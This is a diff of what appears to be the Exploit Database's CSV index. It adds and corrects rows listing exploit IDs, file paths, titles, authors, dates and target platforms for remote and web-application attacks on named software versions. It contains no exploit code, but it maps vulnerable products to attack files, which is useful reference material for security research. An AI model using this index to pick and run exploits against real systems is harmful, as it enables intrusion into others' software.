+48130,exploits/linux/remote/48130.rb,"Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)",2020-02-24,Metasploit,remote,linux,
+48139,exploits/linux/remote/48139.c,"OpenSMTPD 6.6.3 - Arbitrary File Read",2020-02-26,"Qualys Corporation",remote,linux,
+48140,exploits/openbsd/remote/48140.c,"OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution",2020-02-26,"Qualys Corporation",remote,openbsd,
+48153,exploits/windows/remote/48153.py,"Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution",2020-03-02,Photubias,remote,windows,
+48156,exploits/windows/remote/48156.c,"CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow",2020-03-02,wetw0rk,remote,windows,
+48168,exploits/windows/remote/48168.rb,"Exchange Control Panel - Viewstate Deserialization (Metasploit)",2020-03-05,Metasploit,remote,windows,443
+48169,exploits/multiple/remote/48169.rb,"EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)",2020-03-05,Metasploit,remote,multiple,
+48170,exploits/linux/remote/48170.py,"netkit-telnet-0.17 telnetd (Fedora 31) - 'BraveStarr' Remote Code Execution",2020-03-02,Immunity,remote,linux,
+48181,exploits/windows/remote/48181.rb,"Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit)",2020-03-09,Metasploit,remote,windows,
+48182,exploits/php/remote/48182.rb,"PHP-FPM - Underflow Remote Code Execution (Metasploit)",2020-03-09,Metasploit,remote,php,
+48183,exploits/multiple/remote/48183.rb,"Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)",2020-03-09,Metasploit,remote,multiple,
+48184,exploits/multiple/remote/48184.rb,"Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)",2020-03-09,Metasploit,remote,multiple,
+48186,exploits/multiple/remote/48186.rb,"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)",2020-03-09,Metasploit,remote,multiple,
+48191,exploits/linux/remote/48191.rb,"Nagios XI - Authenticated Remote Command Execution (Metasploit)",2020-03-10,Metasploit,remote,linux,
+48192,exploits/php/remote/48192.rb,"PHPStudy - Backdoor Remote Code execution (Metasploit)",2020-03-10,Metasploit,remote,php,
+48214,exploits/hardware/remote/48214.py,"Drobo 5N2 4.1.1 - Remote Command Injection",2020-03-13,"Ian Sindermann",remote,hardware,
+48223,exploits/linux/remote/48223.rb,"Rconfig 3.x - Chained Remote Code Execution (Metasploit)",2020-03-17,Metasploit,remote,linux,
+48224,exploits/multiple/remote/48224.rb,"ManageEngine Desktop Central - Java Deserialization (Metasploit)",2020-03-17,Metasploit,remote,multiple,
+48228,exploits/hardware/remote/48228.txt,"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)",2020-03-18,FarazPajohan,remote,hardware,
+48233,exploits/multiple/remote/48233.py,"Broadcom Wi-Fi Devices - 'KR00K Information Disclosure",2020-03-18,"Maurizio S",remote,multiple,
+48239,exploits/multiple/remote/48239.txt,"CyberArk PSMP 10.9.1 - Policy Restriction Bypass",2020-03-23,"LAHBAL Said",remote,multiple,
+48268,exploits/linux/remote/48268.go,"Multiple DrayTek Products - Pre-authentication Remote Root Code Execution",2020-03-30,0xsha,remote,linux,
+48272,exploits/linux/remote/48272.rb,"Redis - Replication Code Execution (Metasploit)",2020-03-31,Metasploit,remote,linux,
+48273,exploits/multiple/remote/48273.rb,"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)",2020-03-31,Metasploit,remote,multiple,
+48274,exploits/hardware/remote/48274.rb,"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)",2020-03-31,Metasploit,remote,hardware,
+48275,exploits/windows/remote/48275.rb,"SharePoint Workflows - XOML Injection (Metasploit)",2020-03-31,Metasploit,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -27214,7 +28019,7 @@ id,file,description,date,author,type,platform,port
 21206,exploits/php/webapps/21206.txt,"PHP-Nuke AddOn PHPToNuke.php 1.0 - Cross-Site Scripting",2002-01-06,frog,webapps,php,
 21208,exploits/cgi/webapps/21208.txt,"YaBB 9.1.2000 - Cross-Agent Scripting",2002-01-09,Obscure,webapps,cgi,
 21209,exploits/cgi/webapps/21209.txt,"Ultimate Bulletin Board 5.4/6.0/6.2 - Cross-Agent Scripting",2002-01-09,Obscure,webapps,cgi,
-21220,exploits/php/webapps/21220.txt,"VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Sepahan TelCom IT Group",webapps,php,
+21220,exploits/php/webapps/21220.txt,"VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Ertebat Gostar Co",webapps,php,
 21221,exploits/php/webapps/21221.txt,"Joomla! Component RokModule 1.1 - 'module' Blind SQL Injection",2012-09-10,Yarolinux,webapps,php,
 21222,exploits/php/webapps/21222.txt,"SiteGo - Remote File Inclusion",2012-09-10,L0n3ly-H34rT,webapps,php,
 21230,exploits/php/webapps/21230.txt,"PHP-Nuke 4.x/5.x - Arbitrary File Inclusion",2002-01-16,"Handle Nopman",webapps,php,
@@ -35425,7 +36230,7 @@ id,file,description,date,author,type,platform,port
 35142,exploits/php/webapps/35142.txt,"Social Share - 'search' Cross-Site Scripting",2010-12-23,"Aliaksandr Hartsuyeu",webapps,php,
 35143,exploits/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals - 'PageId' SQL Injection",2010-12-28,"non customers",webapps,php,
 35145,exploits/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' SQL Injection",2010-12-27,Dr.NeT,webapps,php,
-35146,exploits/php/webapps/35146.txt,"PHP < 5.6.2 - 'Shellshock' Safe Mode / Disable Functions Bypass / Command Injection",2014-11-03,"Ryan King (Starfall)",webapps,php,
+35146,exploits/php/webapps/35146.txt,"PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection",2014-11-03,"Ryan King (Starfall)",webapps,php,
 35149,exploits/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",webapps,php,
 35150,exploits/php/webapps/35150.php,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)",2014-11-03,"Stefan Horst",webapps,php,443
 35155,exploits/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,webapps,php,
@@ -35866,7 +36671,7 @@ id,file,description,date,author,type,platform,port
 35904,exploits/jsp/webapps/35904.txt,"ManageEngine ServiceDesk Plus 9.0 < Build 9031 - User Privileges Management",2015-01-26,"Rewterz - Research Group",webapps,jsp,
 35906,exploits/php/webapps/35906.txt,"PHP Webquest 2.6 - SQL Injection",2015-01-26,"jordan root",webapps,php,
 35908,exploits/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,webapps,multiple,
-35910,exploits/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting",2015-01-26,"Sepahan TelCom IT Group",webapps,jsp,
+35910,exploits/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting",2015-01-26,"Ertebat Gostar Co",webapps,jsp,
 35911,exploits/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",webapps,multiple,
 36313,exploits/php/webapps/36313.txt,"webERP 4.3.8 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-17,"High-Tech Bridge SA",webapps,php,
 35982,exploits/windows/webapps/35982.txt,"Hewlett-Packard (HP) UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",webapps,windows,8080
@@ -35884,7 +36689,7 @@ id,file,description,date,author,type,platform,port
 35929,exploits/php/webapps/35929.txt,"Joomla! Component com_voj - SQL Injection",2011-07-08,CoBRa_21,webapps,php,
 35930,exploits/php/webapps/35930.txt,"Prontus CMS - 'page' Cross-Site Scripting",2011-07-11,Zerial,webapps,php,
 35931,exploits/php/webapps/35931.txt,"ICMusic 1.2 - 'music_id' SQL Injection",2011-07-11,kaMtiEz,webapps,php,
-35933,exploits/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting",2015-01-29,"Sepahan TelCom IT Group",webapps,hardware,
+35933,exploits/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting",2015-01-29,"Ertebat Gostar Co",webapps,hardware,
 35940,exploits/php/webapps/35940.txt,"Sphider 1.3.x - Admin Panel Multiple SQL Injections",2011-07-12,"Karthik R",webapps,php,
 35941,exploits/multiple/webapps/35941.txt,"Flowplayer 3.2.7 - 'linkUrl' Cross-Site Scripting",2011-07-12,"Szymon Gruszecki",webapps,multiple,
 35942,exploits/php/webapps/35942.txt,"TCExam 11.2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,"Gjoko Krstic",webapps,php,
@@ -36758,7 +37563,7 @@ id,file,description,date,author,type,platform,port
 37223,exploits/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp?path' Traversal Arbitrary File Access",2012-05-21,"Aung Khant",webapps,asp,
 37224,exploits/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Cross-Site Scripting",2012-05-21,MustLive,webapps,php,
 37225,exploits/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Vulnerabilities",2012-05-20,AkaStep,webapps,php,
-37226,exploits/php/webapps/37226.txt,"Concrete5 FlashUploader - Arbitrary '.SWF' File Upload",2012-05-20,AkaStep,webapps,php,
+37226,exploits/php/webapps/37226.txt,"Concrete5 CMS FlashUploader - Arbitrary '.SWF' File Upload",2012-05-20,AkaStep,webapps,php,
 37350,exploits/php/webapps/37350.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'index.php?id' SQL Injection",2012-06-03,KedAns-Dz,webapps,php,
 37351,exploits/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'admin.php' Multiple SQL Injections",2012-06-03,KedAns-Dz,webapps,php,
 37352,exploits/php/webapps/37352.txt,"Ignite Solutions CMS - 'car-details.php' SQL Injection",2012-06-03,Am!r,webapps,php,
@@ -37104,7 +37909,7 @@ id,file,description,date,author,type,platform,port
 37781,exploits/php/webapps/37781.txt,"Extcalendar 2.0 - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",webapps,php,
 37782,exploits/php/webapps/37782.txt,"web@all - Local File Inclusion / Multiple Arbitrary File Upload Vulnerabilities",2012-09-06,KedAns-Dz,webapps,php,
 37784,exploits/php/webapps/37784.txt,"Pinterestclones - Security Bypass / HTML Injection",2012-09-08,DaOne,webapps,php,
-37785,exploits/php/webapps/37785.txt,"VICIDIAL Call Center Suite - Multiple SQL Injections",2012-09-10,"Sepahan TelCom IT Group",webapps,php,
+37785,exploits/php/webapps/37785.txt,"VICIDIAL Call Center Suite - Multiple SQL Injections",2012-09-10,"Ertebat Gostar Co",webapps,php,
 37786,exploits/php/webapps/37786.txt,"DELTAScripts PHP Links - Multiple SQL Injections",2012-09-10,L0n3ly-H34rT,webapps,php,
 37787,exploits/php/webapps/37787.txt,"WordPress Plugin Download Monitor - 'dlsearch' Cross-Site Scripting",2012-08-30,"Chris Cooper",webapps,php,
 37789,exploits/php/webapps/37789.txt,"OpenFiler 2.3 - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2012-09-06,"Brendan Coles",webapps,php,
@@ -37267,7 +38072,7 @@ id,file,description,date,author,type,platform,port
 38115,exploits/php/webapps/38115.txt,"SimpleInvoices invoices Module - Customer Field Cross-Site Scripting",2012-12-10,tommccredie,webapps,php,
 38118,exploits/xml/webapps/38118.txt,"Qlikview 11.20 SR11 - Blind XML External Entity Injection",2015-09-09,"Alex Haynes",webapps,xml,
 38119,exploits/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - Cross-Site Request Forgery",2015-09-09,"Aryan Bayaninejad",webapps,php,
-38127,exploits/php/webapps/38127.php,"PHP 5.5.9 - 'zend_executor_globals' 'CGIMode FPM WriteProcMemFile' Disable Functions Bypass / Load Dynamic Library",2015-09-10,ylbhz,webapps,php,
+38127,exploits/php/webapps/38127.php,"PHP 5.5.9 - 'zend_executor_globals' 'CGIMode FPM WriteProcMemFile' disable_functions Bypass / Load Dynamic Library",2015-09-10,ylbhz,webapps,php,
 38128,exploits/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",webapps,cgi,5000
 38129,exploits/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",webapps,php,
 38130,exploits/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,webapps,java,
@@ -38046,7 +38851,7 @@ id,file,description,date,author,type,platform,port
 39761,exploits/php/webapps/39761.txt,"WordPress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting",2016-05-04,"Johto Robbie",webapps,php,80
 39762,exploits/cgi/webapps/39762.txt,"NetCommWireless HSPA 3G10WVE Wireless Router - Multiple Vulnerabilities",2016-05-04,"Bhadresh Patel",webapps,cgi,80
 39765,exploits/cgi/webapps/39765.txt,"IPFire < 2.19 Core Update 101 - Remote Command Execution",2016-05-04,"Yann CAM",webapps,cgi,
-39766,exploits/php/webapps/39766.php,"Imagick 3.3.0 (PHP 5.4) - Disable Functions Bypass",2016-05-04,RicterZ,webapps,php,
+39766,exploits/php/webapps/39766.php,"Imagick 3.3.0 (PHP 5.4) - disable_functions Bypass",2016-05-04,RicterZ,webapps,php,
 39777,exploits/asp/webapps/39777.txt,"DotNetNuke 07.04.00 - Administration Authentication Bypass",2016-05-06,"Marios Nicolaides",webapps,asp,80
 39780,exploits/jsp/webapps/39780.txt,"ManageEngine Applications Manager Build 12700 - Multiple Vulnerabilities",2016-05-06,"Saif El-Sherei",webapps,jsp,443
 39781,exploits/php/webapps/39781.txt,"Ajaxel CMS 8.0 - Multiple Vulnerabilities",2016-05-09,DizzyDuck,webapps,php,80
@@ -38524,7 +39329,7 @@ id,file,description,date,author,type,platform,port
 43882,exploits/asp/webapps/43882.rb,"Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - (Authenticated) Arbitrary File Upload",2015-09-28,"Pedro Ribeiro",webapps,asp,
 40961,exploits/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",webapps,multiple,
 40966,exploits/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,webapps,php,
-40968,exploits/php/webapps/40968.php,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",webapps,php,
+40968,exploits/php/webapps/40968.sh,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",webapps,php,
 40970,exploits/php/webapps/40970.php,"PHPMailer < 5.2.18 - Remote Code Execution (PHP)",2016-12-25,"Dawid Golunski",webapps,php,
 40969,exploits/php/webapps/40969.pl,"PHPMailer < 5.2.20 - Remote Code Execution",2016-12-27,"Dawid Golunski",webapps,php,
 40971,exploits/php/webapps/40971.txt,"WordPress Plugin Simply Poll 1.4.1 - SQL Injection",2016-12-28,"TAD GROUP",webapps,php,
@@ -38987,8 +39792,8 @@ id,file,description,date,author,type,platform,port
 41618,exploits/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",webapps,aspx,
 43357,exploits/php/webapps/43357.txt,"Joomla! Component User Bench 1.0 - 'userid' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,
 43358,exploits/php/webapps/43358.txt,"Joomla! Component My Projects 2.0 - SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,
-43361,exploits/multiple/webapps/43361.md,"vBulletin 5 - 'routestring' Remote Code Execution",2017-12-13,SecuriTeam,webapps,multiple,
-43362,exploits/multiple/webapps/43362.md,"vBulletin 5 - 'cacheTemplates' Remote Arbitrary File Deletion",2017-12-13,SecuriTeam,webapps,multiple,
+43361,exploits/multiple/webapps/43361.md,"vBulletin 5.x - 'routestring' Remote Code Execution",2017-12-13,SecuriTeam,webapps,multiple,
+43362,exploits/multiple/webapps/43362.md,"vBulletin 5.x - 'cacheTemplates' Remote Arbitrary File Deletion",2017-12-13,SecuriTeam,webapps,multiple,
 43363,exploits/hardware/webapps/43363.py,"Linksys WVBR0 - 'User-Agent' Remote Command Injection",2017-12-14,nixawk,webapps,hardware,
 43364,exploits/hardware/webapps/43364.txt,"BrightSign Digital Signage - Multiple Vulnerablities",2017-12-19,"Information Paradox",webapps,hardware,
 43365,exploits/php/webapps/43365.txt,"Joomla! Component NextGen Editor 2.1.0 - 'plname' SQL Injection",2017-12-19,"Ihsan Sencan",webapps,php,
@@ -39932,7 +40737,7 @@ id,file,description,date,author,type,platform,port
 44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple,
 44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,
 44192,exploits/php/webapps/44192.txt,"CMS Made Simple 2.1.6 - Remote Code Execution",2018-02-27,"Keerati T.",webapps,php,
-44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,
+44194,exploits/php/webapps/44194.py,"Concrete5 CMS < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,
 44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl,
 44219,exploits/hardware/webapps/44219.txt,"D-Link DIR-600M Wireless - Cross-Site Scripting",2018-03-02,"Prasenjit Kanti Paul",webapps,hardware,
 44220,exploits/multiple/webapps/44220.txt,"antMan < 0.9.1a - Authentication Bypass",2018-03-02,"Joshua Bowser",webapps,multiple,
@@ -41063,7 +41868,7 @@ id,file,description,date,author,type,platform,port
 46615,exploits/windows/webapps/46615.py,"Thomson Reuters Concourse & Firm Central < 2.13.0097 - Directory Traversal / Local File Inclusion",2019-03-28,0v3rride,webapps,windows,
 46616,exploits/php/webapps/46616.txt,"Airbnb Clone Script - Multiple SQL Injection",2019-03-28,"Ahmet Ümit BAYRAM",webapps,php,80
 46617,exploits/ruby/webapps/46617.txt,"Fat Free CRM 0.19.0 - HTML Injection",2019-03-28,"Ismail Tasdelen",webapps,ruby,80
-46618,exploits/php/webapps/46618.txt,"WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion",2019-03-28,"Ali S. Ahmad",webapps,php,80
+46618,exploits/php/webapps/46618.txt,"WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion (PoC)",2019-03-28,"Ali S. Ahmad",webapps,php,80
 46619,exploits/php/webapps/46619.txt,"WordPress Plugin Loco Translate 2.2.1 - Local File Inclusion",2019-03-28,"Ali S. Ahmad",webapps,php,80
 46620,exploits/php/webapps/46620.txt,"i-doit 1.12 - 'qr.php' Cross-Site Scripting",2019-03-28,"BlackFog Team",webapps,php,80
 46622,exploits/php/webapps/46622.txt,"Job Portal 3.1 - 'job_submit' SQL Injection",2019-03-28,"Mehmet EMIROGLU",webapps,php,80
@@ -41078,3 +41883,667 @@ id,file,description,date,author,type,platform,port
 46635,exploits/php/webapps/46635.py,"CMS Made Simple < 2.2.10 - SQL Injection",2019-04-02,"Daniele Scanu",webapps,php,
 46637,exploits/php/webapps/46637.txt,"Fiverr Clone Script 1.2.2 - SQL Injection / Cross-Site Scripting",2019-04-02,"Mr Winst0n",webapps,php,
 46638,exploits/php/webapps/46638.py,"phpFileManager 1.7.8 - Local File Inclusion",2019-04-02,"Murat Kalafatoglu",webapps,php,
+46640,exploits/php/webapps/46640.txt,"iScripts ReserveLogic - SQL Injection",2019-04-03,"Ahmet Ümit BAYRAM",webapps,php,80
+46642,exploits/php/webapps/46642.txt,"Clinic Pro v4 - 'month' SQL Injection",2019-04-03,"Abdullah Çelebi",webapps,php,80
+46643,exploits/php/webapps/46643.txt,"Ashop Shopping Cart Software - SQL Injection",2019-04-03,"Ahmet Ümit BAYRAM",webapps,php,80
+46644,exploits/php/webapps/46644.txt,"PhreeBooks ERP 5.2.3 - Arbitrary File Upload",2019-04-03,"Abdullah Çelebi",webapps,php,80
+46658,exploits/php/webapps/46658.py,"FreeSMS 2.1.2 - SQL Injection (Authentication Bypass)",2019-04-04,"Yilmaz Degirmenci",webapps,php,80
+46659,exploits/jsp/webapps/46659.py,"Manage Engine ServiceDesk Plus 10.0 - Privilege Escalation",2019-04-05,"Ata Hakçıl_ Melih Kaan Yıldız",webapps,jsp,
+46661,exploits/php/webapps/46661.html,"WordPress Plugin Contact Form Maker 1.13.1 - Cross-Site Request Forgery",2019-04-05,"Peyman Forouzan",webapps,php,
+46663,exploits/php/webapps/46663.txt,"Jobgator - 'experience' SQL Injection",2019-04-08,"Ahmet Ümit BAYRAM",webapps,php,80
+46664,exploits/php/webapps/46664.html,"Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution",2019-04-08,FelipeGaspar,webapps,php,80
+46666,exploits/php/webapps/46666.txt,"ShoreTel Connect ONSITE < 19.49.1500.0 - Multiple Vulnerabilities",2019-04-08,Ramikan,webapps,php,
+46667,exploits/hardware/webapps/46667.txt,"SaLICru -SLC-20-cube3(5) - HTML Injection",2019-04-08,Ramikan,webapps,hardware,
+46669,exploits/linux/webapps/46669.txt,"CentOS Web Panel 0.9.8.793 (Free) / 0.9.8.753 (Pro) - Cross-Site Scripting",2019-04-08,DKM,webapps,linux,
+46671,exploits/php/webapps/46671.txt,"Tradebox CryptoCurrency - 'symbol' SQL Injection",2019-04-08,"Abdullah Çelebi",webapps,php,80
+46672,exploits/php/webapps/46672.js,"WordPress Plugin Limit Login Attempts Reloaded 2.7.4 - Login Limit Bypass",2019-04-08,isdampe,webapps,php,80
+46674,exploits/java/webapps/46674.txt,"ManageEngine ServiceDesk Plus 9.3 - User Enumeration",2019-04-08,Operat0r,webapps,java,
+48177,exploits/php/webapps/48177.txt,"60CycleCMS  - 'news.php' SQL Injection",2020-03-09,Unkn0wn,webapps,php,
+46681,exploits/php/webapps/46681.txt,"Ashop Shopping Cart Software - 'bannedcustomers.php?blacklistitemid' SQL Injection",2019-04-09,"Doğukan Karaciğer",webapps,php,80
+46684,exploits/php/webapps/46684.py,"Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Unauthenticated Remote Code Execution",2019-04-10,"Julien Ahrens",webapps,php,443
+46687,exploits/hardware/webapps/46687.txt,"D-Link DI-524 V2.06RU - Multiple Cross-Site Scripting",2019-04-10,"Semen Alexandrovich Lyhin",webapps,hardware,80
+46691,exploits/php/webapps/46691.rb,"ATutor < 2.2.4 - 'file_manager' Remote Code Execution (Metasploit)",2019-04-12,AkkuS,webapps,php,
+46694,exploits/php/webapps/46694.txt,"DirectAdmin 1.561 - Multiple Vulnerabilities",2019-04-15,InfinitumIT,webapps,php,
+46706,exploits/hardware/webapps/46706.txt,"Zyxel ZyWall 310 / ZyWall 110 / USG1900 / ATP500 / USG40 - Login Page Cross-Site Scripting",2019-04-16,"Aaron Bishop",webapps,hardware,80
+46710,exploits/php/webapps/46710.py,"Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion",2019-04-16,"Haboob Team",webapps,php,80
+46728,exploits/windows/webapps/46728.txt,"Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal",2019-04-19,"Vahagn Vardanyan",webapps,windows,
+46729,exploits/windows/webapps/46729.txt,"Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection",2019-04-19,"Vahagn Vardanyan",webapps,windows,
+46734,exploits/php/webapps/46734.txt,"WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion",2019-04-22,"Panagiotis Vagenas",webapps,php,80
+46738,exploits/php/webapps/46738.html,"74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User)",2019-04-22,ax8,webapps,php,80
+46739,exploits/php/webapps/46739.html,"Msvod 10 - Cross-Site Request Forgery (Change User Information)",2019-04-22,ax8,webapps,php,80
+46741,exploits/php/webapps/46741.txt,"UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting",2019-04-22,"Kağan EĞLENCE",webapps,php,80
+46751,exploits/hardware/webapps/46751.txt,"JioFi 4G M2S 1.0.2 - 'mask' Cross-Site Scripting",2019-04-25,"Vikas Chaudhary",webapps,hardware,
+46753,exploits/php/webapps/46753.txt,"osTicket 1.11 - Cross-Site Scripting / Local File Inclusion",2019-04-25,AkkuS,webapps,php,80
+46759,exploits/java/webapps/46759.txt,"Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting",2019-04-26,"Dhiraj Mishra",webapps,java,
+46764,exploits/hardware/webapps/46764.sh,"Netgear DGN2200 / DGND3700 - Admin Password Disclosure",2019-04-30,"Social Engineering Neo",webapps,hardware,
+46765,exploits/ashx/webapps/46765.txt,"Veeam ONE Reporter 9.5.0.3201 - Multiple Cross-Site Request Forgery",2019-04-30,"Seyed Sadegh Khatami",webapps,ashx,
+46766,exploits/ashx/webapps/46766.txt,"Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting",2019-04-30,"Seyed Sadegh Khatami",webapps,ashx,
+46767,exploits/ashx/webapps/46767.txt,"Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget)",2019-04-30,"Seyed Sadegh Khatami",webapps,ashx,
+46768,exploits/hardware/webapps/46768.sh,"Intelbras IWR 3000N - Denial of Service (Remote Reboot)",2019-04-30,"Social Engineering Neo",webapps,hardware,
+46769,exploits/php/webapps/46769.txt,"Joomla! Component ARI Quiz 3.7.4 - SQL Injection",2019-04-30,"Mr Winst0n",webapps,php,80
+46770,exploits/hardware/webapps/46770.html,"Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery",2019-04-30,"Social Engineering Neo",webapps,hardware,
+46771,exploits/php/webapps/46771.txt,"HumHub 1.3.12 - Cross-Site Scripting",2019-04-30,"Kağan EĞLENCE",webapps,php,80
+46772,exploits/java/webapps/46772.rb,"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)",2019-04-30,"Dhiraj Mishra",webapps,java,8888
+46773,exploits/multiple/webapps/46773.py,"Domoticz 4.10577 - Unauthenticated Remote Command Execution",2019-04-30,"Fabio Carretto",webapps,multiple,
+46774,exploits/php/webapps/46774.txt,"Joomla! Component JiFile 2.3.1 - Arbitrary File Download",2019-04-30,"Mr Winst0n",webapps,php,80
+46776,exploits/php/webapps/46776.txt,"Hyvikk Fleet Manager - Shell Upload",2019-04-30,saxgy1331,webapps,php,
+46784,exploits/linux/webapps/46784.txt,"CentOS Web Panel 0.9.8.793 (Free) / v0.9.8.753 (Pro) / 0.9.8.807 (Pro) - Domain Field (Add DNS Zone) Cross-Site Scripting",2019-05-01,DKM,webapps,linux,
+46777,exploits/php/webapps/46777.txt,"Agent Tesla Botnet - Information Disclosure",2019-04-30,n4pst3r,webapps,php,
+46780,exploits/windows/webapps/46780.py,"Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution",2019-04-30,"Avinash Kumar Thapa",webapps,windows,
+46786,exploits/hardware/webapps/46786.txt,"Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection",2019-05-03,"Jacob Baines",webapps,hardware,
+46787,exploits/php/webapps/46787.txt,"Instagram Auto Follow - Authentication Bypass",2019-05-03,Veyselxan,webapps,php,
+46788,exploits/multiple/webapps/46788.txt,"Zotonic < 0.47.0 mod_admin - Cross-Site Scripting",2019-05-03,"Ramòn Janssen",webapps,multiple,
+46794,exploits/php/webapps/46794.py,"Wordpress Plugin Social Warfare < 3.5.3 - Remote Code Execution",2019-05-03,hash3liZer,webapps,php,
+46796,exploits/multiple/webapps/46796.txt,"ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution",2019-05-06,"Gilson Camelo",webapps,multiple,
+46798,exploits/php/webapps/46798.txt,"PHPads 2.0 - 'click.php3?bannerID' SQL Injection",2019-05-06,"felipe andrian",webapps,php,80
+46799,exploits/asp/webapps/46799.txt,"microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection",2019-05-06,"felipe andrian",webapps,asp,80
+46804,exploits/multiple/webapps/46804.txt,"Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting",2019-05-07,alt3kx,webapps,multiple,80
